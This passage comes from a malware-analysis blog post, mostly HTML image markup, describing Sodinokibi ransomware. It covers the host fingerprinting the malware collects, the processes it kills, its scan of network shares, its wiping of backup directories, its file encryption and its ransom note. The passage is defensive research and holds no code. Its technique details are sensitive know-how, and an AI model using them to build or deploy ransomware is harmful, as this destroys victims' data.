/website/static/71483169f9b55bf0ba5291baff58297e/adc48/MalwareTalesSo7.png 979w&quot;
        sizes=&quot;(max-width: 979px) 100vw, 979px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;sk&lt;/strong&gt;&lt;/em&gt;”: secondary key, base64 encoded key generated at runtime&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;unm&lt;/strong&gt;&lt;/em&gt;”: username&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;net&lt;/strong&gt;&lt;/em&gt;” : hostname&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;grp&lt;/strong&gt;&lt;/em&gt;”: windows domain&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1170px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/9907d1c6378d17d2bea64274b6bfe732/105d8/MalwareTalesSo8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 66.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAABYlAAAWJQFJUiTwAAACR0lEQVR42lWR627UMBCF8/6vAA+AUPmBKrVIgBCCH1Co1G13u7vdJJvNZeMkvsZ2bOc2OBSQsD5ZGslnzsxxAKPBZbLb3OXxIdw8SIpwkd2tb6M4qlIUZQmjRGBEUEarXBDUUk8lSNlJFgyaFsnheDzwKmPZEUZpOIrCNw26bOsPVXUt6btePU6Gg2Ng6NwRf4Mh4GRgfNs03Ic7jHKcxKMmrMw365uq2PteTXnoWGpFKatTR3JDco0zT4czJ0lgWlKlYbx/aNK4SaPZMl7mj9tbwdJJU19aUbm21hT1ijjZ9BI7ia2oR9MGVuIsejw+ren5VB2f/LuOou1hZSUFa8H1s7GTUYNqwLBB4Y6h2bBJk0XstDonh3C74mVGstjv1vMsiV6czy8VvZD0QrFXmn2ZbQuWe8O+bbwBOA6DDgTW4Wb9+cNVfQpVXcDQqqbY719z8lbSa0WvFL3U7Gb2gVnunf0W3nbJzKkAoDeat5y0rDGKwGxEp3IuYJpghGemvp+snJ3yQK9h6BZGF8zzDAA8acJwc26OHaWDkkIo345b5X8ORuV4OYpyJOlIcz8aTA5+n2BatPA95pff7veb1TlMcRQXxaemel9WXylKaZ2jZF+fdvVxWyc7Uia6pX/Ez86r5Pzx4WcU3/O6lHXRyZVTd514ELhQDJFzzMqY5SErohYXVov/xPjAtk9rJKKpZ8uofQdOw7Kh8PSymjUGVc/+w3zOo/k39iL+gfimTK2ufTCTZqMks2thQXrGjv8t29kKGOyz+Bc079NT0tSYtQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/9907d1c6378d17d2bea64274b6bfe732/105d8/MalwareTalesSo8.png&quot;
        srcset=&quot;/website/static/9907d1c6378d17d2bea64274b6bfe732/804b2/MalwareTalesSo8.png 384w,
/website/static/9907d1c6378d17d2bea64274b6bfe732/e5715/MalwareTalesSo8.png 768w,
/website/static/9907d1c6378d17d2bea64274b6bfe732/105d8/MalwareTalesSo8.png 1170w&quot;
        sizes=&quot;(max-width: 1170px) 100vw, 1170px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;lng&lt;/strong&gt;&lt;/em&gt;”: language&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 827px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d55a35e023ef1993702a277175ac8424/4e6ec/MalwareTalesSo9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 22.135416666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA20lEQVR42g3HyU7DMBRA0fw3/EX3sGbHD3QDQi1ig0oHhqbErofEjp8d2/FL06RtpKsj3Wx7kC+rP0FKTv5zvkxumyw9eUBXRk36pgxqUiKwqGlnBQJPhrX1MYHINsXybf1A8yeWP5Lijhb3rJi1do9Od15fe5+cGpNNrkKn+lBjo87RdF61TmXim359fhiRa8mYICHFIZoR66GFIerryZ2DGhJcOjvEetoRAW11QTuiyxab4/x9R9bk92e1o8++eY1mEYA3mgPfO3mwMg9GBCMDyEkjyVQtiwDVDSAy2UyWW3WOAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo9&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d55a35e023ef1993702a277175ac8424/4e6ec/MalwareTalesSo9.png&quot;
        srcset=&quot;/website/static/d55a35e023ef1993702a277175ac8424/804b2/MalwareTalesSo9.png 384w,
/website/static/d55a35e023ef1993702a277175ac8424/e5715/MalwareTalesSo9.png 768w,
/website/static/d55a35e023ef1993702a277175ac8424/4e6ec/MalwareTalesSo9.png 827w&quot;
        sizes=&quot;(max-width: 827px) 100vw, 827px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;bro&lt;/strong&gt;&lt;/em&gt;”: brother? Sodinokibi retrieves the keyboard language with GetKeyboardLayoutList. Then it implements an algorithm that gives “True” as value for this key only if the nation code ends with a byte between 0x18 and 0x2c. It’s not odd that inside this range there are the majority of the East-Europe language codes, like Russian, Cyrillic and Romanian. It’s a clear indication of the origin of the malware authors.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 996px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3b56938146b4124395333183d25e4a90/5caea/MalwareTalesSo10.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2klEQVR42g2OS06FMBhG2bdLcO4CXIAb0JmJDnzcmGjwWlvoRfr8+7yFUgSR5BucyTn5KmANpy0osYxQH9kXol5Az4m3pESRg8lejKYb9GlyfTY/STXZ9iWqfZWTVBEkKM5OHvDjw+s1+bj5rC8RujDyKpm6RBgsGx2fgpyCKEHsXKLOXla6J9DgBGxbzuzYYPzsFLKa2sDX2f1l9ZvMOsCSYMtuPsOubSUsg1lHW5H6zbTf6rSflC9IPh2wIOq9vqPyNqj7HPkU9QDd5FlSbdRdsnz0ci/OCf4BZ6/ZuO7slCEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo10&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3b56938146b4124395333183d25e4a90/5caea/MalwareTalesSo10.png&quot;
        srcset=&quot;/website/static/3b56938146b4124395333183d25e4a90/804b2/MalwareTalesSo10.png 384w,
/website/static/3b56938146b4124395333183d25e4a90/e5715/MalwareTalesSo10.png 768w,
/website/static/3b56938146b4124395333183d25e4a90/5caea/MalwareTalesSo10.png 996w&quot;
        sizes=&quot;(max-width: 996px) 100vw, 996px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;os&lt;/strong&gt;&lt;/em&gt;”: full OS name&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 767px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/91b4d066be61f7f6e86673fb952193ab/6c2f2/MalwareTalesSo11.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 21.614583333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA3UlEQVR42g3Iy07CQABA0f6/8Qs0bl2wInGhiXsxEJSAoi1g23He0+m8p9OCtZubm5M97IrV5g0ey3z//F3fCzbXbJmM6DQ1tEwKWVp2Esbm1/HasSpKGATwvI4NzBbb2Ud+C08zXN8hcF2XVxjcOLnvlIiGjYOLil2i6gwPiiYrppnauyYZnm1f8s+vd0MZARBgZH04W33p2iHI3vGx14Pjg2V/kzhxDnKSZFjSdEwqe1yjzXoHDrgoFgf65N1rb5e+hU6SFh01ORnyo1BhOfCK+pYYgRpSNbjSHP4DPvjYmMYcAAkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo11&quot;
        title=&quot;&quot;
        src=&quot;/website/static/91b4d066be61f7f6e86673fb952193ab/6c2f2/MalwareTalesSo11.png&quot;
        srcset=&quot;/website/static/91b4d066be61f7f6e86673fb952193ab/804b2/MalwareTalesSo11.png 384w,
/website/static/91b4d066be61f7f6e86673fb952193ab/6c2f2/MalwareTalesSo11.png 767w&quot;
        sizes=&quot;(max-width: 767px) 100vw, 767px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;bit&lt;/strong&gt;&lt;/em&gt;”: Sodinokibi extracts this value from “GetNativeSystemInfo” then it compares with 9 that corresponds to the x64 architecture. Further processing will generate “40” if the architecture is 64bit, “56” otherwise.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 550px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3f1d39aa8512f741c94ddb4011d91013/dd45a/MalwareTalesSo12.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 20.052083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA40lEQVR42g3M206DMAAAUD7exJj44GKiX+IHmInJpgWBCBS2rqVcCmu5lDsY6pLzfDT8pbufe5Gn9OTZun6N0NJepybnjL4DYAU6gUGd5TKNzwRwZuDCGYQ/VHCoqXZ5enTu77j9zQlBlslTFEOv4/E5uTybtvlrQNflURnDPQwfMN6x5CWjr2m0kxxoFMHQt6ucFPhkHT5EjG/+WtEVNLAMRDyRkaYSZZGKSsi+W2q5dN02TrMsNUZC5DtjzaoE3wq1ym1t1NrSgrwFx7z0x56ppVUrVuvP0oNZHiZ53Cag5uQfn0jSwqzpWpsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo12&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3f1d39aa8512f741c94ddb4011d91013/dd45a/MalwareTalesSo12.png&quot;
        srcset=&quot;/website/static/3f1d39aa8512f741c94ddb4011d91013/804b2/MalwareTalesSo12.png 384w,
/website/static/3f1d39aa8512f741c94ddb4011d91013/dd45a/MalwareTalesSo12.png 550w&quot;
        sizes=&quot;(max-width: 550px) 100vw, 550px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;dsk&lt;/strong&gt;&lt;/em&gt;”: base64 encoded value generated based on the drives found on the machine.&lt;/li&gt;
&lt;li&gt;“&lt;em&gt;&lt;strong&gt;ext&lt;/strong&gt;&lt;/em&gt;”: new in 1.01. The random extension used for encrypted files.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;5.Encryption preparation inspired by GandCrab&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;At this time, before performing the encryption, Sodinokibi replicates a behavior that is very similar to what GandCrab performs, suggesting that Sodinokibi authors learned from GandCrab ones or that they are strictly related.&lt;/p&gt;
&lt;p&gt;Sodinokibi extracts the running processes with the combination of CreateToolhelp32Snapshot, Process32First and Process32First and checks if they match the names in the configuration. In that case, those processes are killed. The reason is that these programs could hold write access on files and therefore they could not allow the ransomware to encrypt them.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 860px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/a9e2a5266d2757153e6dd793e040d585/914ae/MalwareTalesSo13.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 14.322916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAuUlEQVR42gXBuQ6CMAAAUD5Zf0BGXUwc/AUnXYBFE5k0UYgXiHIU2gJtuQ8NEgc83uMyiqzrKaM4dBELvVeJFRhJmhjDCXZGEPRoMKX+OKHi+1EB2zgoW0tVKAShD7kqJcg2yiTwrueEuF3DVEIEc5biAcE88fsxGUaEL5PFt21CZCNLM9RNRr1PW3AYOPJSMvWjcVEoAk3JTPsuqwL2VlW0rvN5Gu+exb7O9JwFAXQYcsDtWDD065o/6OSX3OB7wJ4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo13&quot;
        title=&quot;&quot;
        src=&quot;/website/static/a9e2a5266d2757153e6dd793e040d585/914ae/MalwareTalesSo13.png&quot;
        srcset=&quot;/website/static/a9e2a5266d2757153e6dd793e040d585/804b2/MalwareTalesSo13.png 384w,
/website/static/a9e2a5266d2757153e6dd793e040d585/e5715/MalwareTalesSo13.png 768w,
/website/static/a9e2a5266d2757153e6dd793e040d585/914ae/MalwareTalesSo13.png 860w&quot;
        sizes=&quot;(max-width: 860px) 100vw, 860px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The list of the version 1.00 contains only the “mysql.exe” process, while the list of the version 1.01 is a lot longer and almost matches the ones used by GandCrab (source: &lt;a href=&quot;https://www.broadcom.com/support/security-center?docid=2018-013106-5656-99&quot;&gt;Symantec&lt;/a&gt; ).&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 888px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/438344c959d707182437514e47b6b476/b04e4/MalwareTalesSo14.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 27.864583333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABi0lEQVR42nXLPW/TUBgFYK/MLGFADPxCfgEwgAQSYkEd2BmQ2Bj4kFKpasNCEHHSJP6ofX0Tx9cf742d+Dqu0zc9pN0ZHp0jHR2rLBK43gyUSlRKQk4vcdtV4LqA9H9hdHmOpeOgDGzkYoi2CnFoYxx2a9wYAm9TdNUK+43CbZPDapYBHN9BmkTQ0sdqNkNbKtRa4WJyhsnoHZy/7+GOX8Nz36BQJ8hXH2HWIQzF2CynqBZTrIWNOnFhtTrhwJ9zriLWUnAVS+42KRtK+Xxqsyu+sE5+cEN91uobN+Upl9kpt1V8lHFbJrzfZrzT8eG6Umztwhl+fv6EwfeviD0Xnj3CtsygVyGk/QG/x88wtl9Aeq/gz55DXL1EFJxApwusVYRCTBDPhyjCCao0glWmsriajkhJj2qVUEOK0JV0XWsaenNK8j900wja34uoMyHtjSDeEXXbnLZpoOtMFHfJJi+szSZ+mOfRI2OynsmyHmDuZcb03oq7jv84bsfPYNB/4vuTx8OL/lNg8eAfX1uiO96SQ0MAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo14&quot;
        title=&quot;&quot;
        src=&quot;/website/static/438344c959d707182437514e47b6b476/b04e4/MalwareTalesSo14.png&quot;
        srcset=&quot;/website/static/438344c959d707182437514e47b6b476/804b2/MalwareTalesSo14.png 384w,
/website/static/438344c959d707182437514e47b6b476/e5715/MalwareTalesSo14.png 768w,
/website/static/438344c959d707182437514e47b6b476/b04e4/MalwareTalesSo14.png 888w&quot;
        sizes=&quot;(max-width: 888px) 100vw, 888px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Another check done by the ransomware is for available network resources with WNetOpenEnumW e WNetEnumResourceW with the aim to find other files to encrypt.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/aafbf38ec0e50bc78f8186be0bff492f/4d08a/MalwareTalesSo15.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 14.322916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAaElEQVR42m2MSwrEMAxDc/9TjhP5lyyaEphsR+2sChXYlsWzyxgjs4vUzHR3NQuPKjUieh+qFtzDoSBGMQFg7mutIiIKZSdi5vK5zPVFtTbYLdKNAu/jnmAdc5Y5z73396mX5OH3n/kBXCylmKE0Kw8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo15&quot;
        title=&quot;&quot;
        src=&quot;/website/static/aafbf38ec0e50bc78f8186be0bff492f/4d08a/MalwareTalesSo15.png&quot;
        srcset=&quot;/website/static/aafbf38ec0e50bc78f8186be0bff492f/804b2/MalwareTalesSo15.png 384w,
/website/static/aafbf38ec0e50bc78f8186be0bff492f/4d08a/MalwareTalesSo15.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Last operation before the encryption is to find all the directories with a name that matches the configuration key “wfld” and to wipe them. In this case, the list contains only “backup”. So, for example, Sodinokibi deletes Windows Defenders updates backups.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1005px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/9875cf1233768a10a4ea8abe7665fbdf/18c13/MalwareTalesSo16.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 12.239583333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfklEQVR42g3GsQ6CMBAAUP7/ixyUwRgHjKIkUoIUK4VWekc9SjVYB/VNLxo0b0WJvcRGeNTfzyQvjNfL0aRwz4jYyxbBm+AgeJhJB9fPD/Um/X/UXdV+HSerRXVKBTs70yRFvd3lt1wey9jYzdMeRlBkpEOFLYe2mgZF0DlUP5dPaufti5MKAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo16&quot;
        title=&quot;&quot;
        src=&quot;/website/static/9875cf1233768a10a4ea8abe7665fbdf/18c13/MalwareTalesSo16.png&quot;
        srcset=&quot;/website/static/9875cf1233768a10a4ea8abe7665fbdf/804b2/MalwareTalesSo16.png 384w,
/website/static/9875cf1233768a10a4ea8abe7665fbdf/e5715/MalwareTalesSo16.png 768w,
/website/static/9875cf1233768a10a4ea8abe7665fbdf/18c13/MalwareTalesSo16.png 1005w&quot;
        sizes=&quot;(max-width: 1005px) 100vw, 1005px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;6.Ransomware attack&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Finally (or not?) Sodinokibi starts to iterate over the available directories with FindFirstFile and FindNextFile.&lt;/p&gt;
&lt;p&gt;It skips files and directories that match conditions on the whitelist configuration. The others are encrypted by the ransomware that adds the random generated key as extension to the name.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1237px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/dd910ebdd1b058e1674075ba522af101/b5dee/MalwareTalesSo17.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 7.552083333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhElEQVR42j2JwQqCQAAF/fPO0bFb9A0du9cfREFIha65q6sr6K4R4dq0FXgY3mMmOp3nJLc1l+uKOF5SykMgx6iEWqZUAVMImjL7rc6DV+nEt4fm3y9HZ+Qu0tmWQmwQYoYSC6w+4l3N2FcMtmRoJaPTwYXfqYlnc///VuFt4aGHR73/AJcLkpGy+MhLAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo17&quot;
        title=&quot;&quot;
        src=&quot;/website/static/dd910ebdd1b058e1674075ba522af101/b5dee/MalwareTalesSo17.png&quot;
        srcset=&quot;/website/static/dd910ebdd1b058e1674075ba522af101/804b2/MalwareTalesSo17.png 384w,
/website/static/dd910ebdd1b058e1674075ba522af101/e5715/MalwareTalesSo17.png 768w,
/website/static/dd910ebdd1b058e1674075ba522af101/b5dee/MalwareTalesSo17.png 1237w&quot;
        sizes=&quot;(max-width: 1237px) 100vw, 1237px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;In each directory the malware also write the ransom note “&lt;em&gt;&lt;strong&gt;{ext}.readme.txt&lt;/strong&gt;&lt;/em&gt;” extracted from the configuration and a lock file.&lt;/p&gt;
&lt;p&gt;Then it creates a file with a random name “{random}.bmp” in the %TEMP% which contains the image that will be put as a background with the help of DrawTextW and FillRect functions.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1039px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6e1b082b85c53e9a6e0e9b24327f9016/22475/MalwareTalesSo18.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 4.6875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAAAsTAAALEwEAmpwYAAAASElEQVR42gE9AML/AM3BvcO4stzSztfMzO7n38zZ3rvGzN3T29HXt+fotu3n3uzn4uzn4O3o4+ff1+Xaz+nh2ebb0Ofc0eng2O0dMr0dQu9rAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo18&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6e1b082b85c53e9a6e0e9b24327f9016/22475/MalwareTalesSo18.png&quot;
        srcset=&quot;/website/static/6e1b082b85c53e9a6e0e9b24327f9016/804b2/MalwareTalesSo18.png 384w,
/website/static/6e1b082b85c53e9a6e0e9b24327f9016/e5715/MalwareTalesSo18.png 768w,
/website/static/6e1b082b85c53e9a6e0e9b24327f9016/22475/MalwareTalesSo18.png 1039w&quot;
        sizes=&quot;(max-width: 1039px) 100vw, 1039px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;7.C2 Registration&lt;/strong&gt;&lt;/h1&gt;
